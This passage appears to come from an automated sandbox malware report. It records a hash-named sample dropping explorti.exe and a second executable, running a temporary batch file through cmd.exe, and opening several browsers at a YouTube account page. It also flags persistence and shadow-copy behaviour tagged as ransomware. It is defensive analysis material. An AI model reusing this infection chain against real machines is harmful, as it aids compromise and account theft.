Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3892 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3892 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 3892 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
PID 2144 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe
PID 2144 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe
PID 2144 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe
PID 4824 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe C:\Windows\system32\cmd.exe
PID 4836 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4836 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4836 wrote to memory of 4644 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4836 wrote to memory of 4644 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4836 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4836 wrote to memory of 3136 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3076 wrote to memory of 4004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3076 wrote to memory of 4004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4644 wrote to memory of 1020 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4644 wrote to memory of 1020 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3136 wrote to memory of 5064 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 5064 wrote to memory of 4940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe

"C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D997.tmp\D998.tmp\D999.bat C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa1279cc40,0x7ffa1279cc4c,0x7ffa1279cc58

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa126546f8,0x7ffa12654708,0x7ffa12654718

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc262b5e-d8fa-469d-8120-04b015cdf2f1} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=1928 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2112,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

